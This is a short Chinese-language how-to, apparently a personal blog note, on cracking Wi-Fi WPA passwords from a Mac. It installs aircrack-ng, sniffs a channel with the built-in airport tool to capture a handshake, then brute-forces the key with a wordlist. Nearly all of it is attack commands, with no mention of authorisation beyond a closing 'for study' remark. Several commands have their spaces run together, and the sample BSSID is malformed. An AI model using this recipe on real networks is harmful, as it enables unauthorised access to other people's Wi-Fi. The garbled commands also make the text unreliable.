1、安装aircrack-ng
命令:brewinstallaircrack-ng
注意,如果没安装brew,访问:https://brew.sh,首页上有安装brew的命令,我安装时(201706)命令如下:
/usr/bin/ruby -e "$(curl -fsSLhttps://raw.githubusercontent.com/Homebrew/install/master/install)"
2、添加airport快链
命令:ln-s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
3、使用mac自带的airport选取mac地址
命令:airport-s
选择CHANNEL的数值,比如:11
4、监听选定的频道获取到握手的包
命令:airport en0 sniff 11
运行一段时间,就可以在/tmp收获以.cap结尾的分析包,结束之后会提示保存的.cap文件位置
注意:(1)尽可能不要运行太长时间,否则.cap文件会比较大;
(2)可以使用ctr+c结束运行(我刚开始就不知道🙈);
(3)如果提示权限问题,则使用 sudoairport en0 sniff 11
5、用 aircrack-ng分析cap包
命令:sudoaircrack-ng /tmp/airportSniff******.cap
找到有(1 handshake)的那一行记录,记录下BSSID(比如是:10:02:22:23:7v:6f)。
建议直接搜索,否则能看晕,如果没有搜索到,请重新执行第4步;
6、开始暴力破解
命令:sudo aircrack-ng-wpojie.txt-b10:02:22:23:7v:6f/tmp/airportSniff******.cap
注意:.txt为破解字典
如果有碰撞到密码,程序会停止,并显示密码。
本文参考别的资料实践并结合实际情况进行总结,权做记录学习之用。
